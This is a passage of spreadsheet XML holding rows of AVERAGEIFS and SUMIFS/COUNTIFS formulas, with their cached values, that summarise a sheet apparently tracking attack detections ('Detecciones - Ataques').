        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>2.5</v>
      </c>
      <c r="BT142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>15</v>
      </c>
      <c r="BZ142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA142" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC142" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>2</v>
      </c>
      <c r="CG142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>2</v>
      </c>
      <c r="CI142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>22</v>
      </c>
      <c r="CJ142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>6</v>
      </c>
      <c r="CL142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>6.625</v>
      </c>
      <c r="CN142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1.25</v>
      </c>
      <c r="CP142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>10</v>
      </c>
      <c r="CQ142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>2</v>
      </c>
      <c r="CR142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.3460109144</v>
      </c>
      <c r="CT142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>1</v>
      </c>
      <c r="CW142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>2</v>
      </c>
      <c r="CY142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ142" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.181818182</v>
      </c>
      <c r="DK142" s="271"/>
    </row>
    <row r="143">
      <c r="J143" s="277"/>
      <c r="K143" s="512"/>
      <c r="L143" s="512"/>
      <c r="M143" s="512"/>
      <c r="N143" s="512"/>
      <c r="O143" s="278"/>
      <c r="Q143" s="271"/>
      <c r="R143" s="386" t="s">
        <v>2562</v>
      </c>
      <c r="S143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>1.040454112</v>
      </c>
      <c r="T143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.9998561358</v>
      </c>
      <c r="U143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.9359398496</v>
      </c>
      <c r="V143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.8333333333</v>
      </c>
      <c r="W143" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>2017.142857</v>
      </c>
      <c r="Y143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>1.4</v>
      </c>
      <c r="Z143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>7282.458638</v>
      </c>
      <c r="AA143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>3.661538462</v>
      </c>
      <c r="AB143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>6.447916667</v>
      </c>
      <c r="AC143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>3.1</v>
      </c>
      <c r="AD143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>1.764360002</v>
      </c>
      <c r="AE143" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>1.3</v>
      </c>
      <c r="AF143" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GI$3:$GI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>1.078686869</v>
      </c>
      <c r="AG143" s="271"/>
      <c r="AH143" s="386" t="s">
        <v>2562</v>
      </c>
      <c r="AI143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.414241558</v>
      </c>
      <c r="AJ143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>4</v>
      </c>
      <c r="AL143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.9998561358</v>
      </c>
      <c r="AN143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3718796992</v>
      </c>
      <c r="AR143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.8333333333</v>
      </c>
      <c r="AS143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>1</v>
      </c>
      <c r="AU143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>3.5</v>
      </c>
      <c r="AV143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AW143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AY143" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>1</v>
      </c>
      <c r="BA143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB143" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>4705.333333</v>
      </c>
      <c r="BD143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>1904.959349</v>
      </c>
      <c r="BN143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>14914.51508</v>
      </c>
      <c r="BO143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.1</v>
      </c>
      <c r="BR143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>3</v>
      </c>
      <c r="BT143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>15</v>
      </c>
      <c r="BZ143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA143" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC143" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF143" s="518">
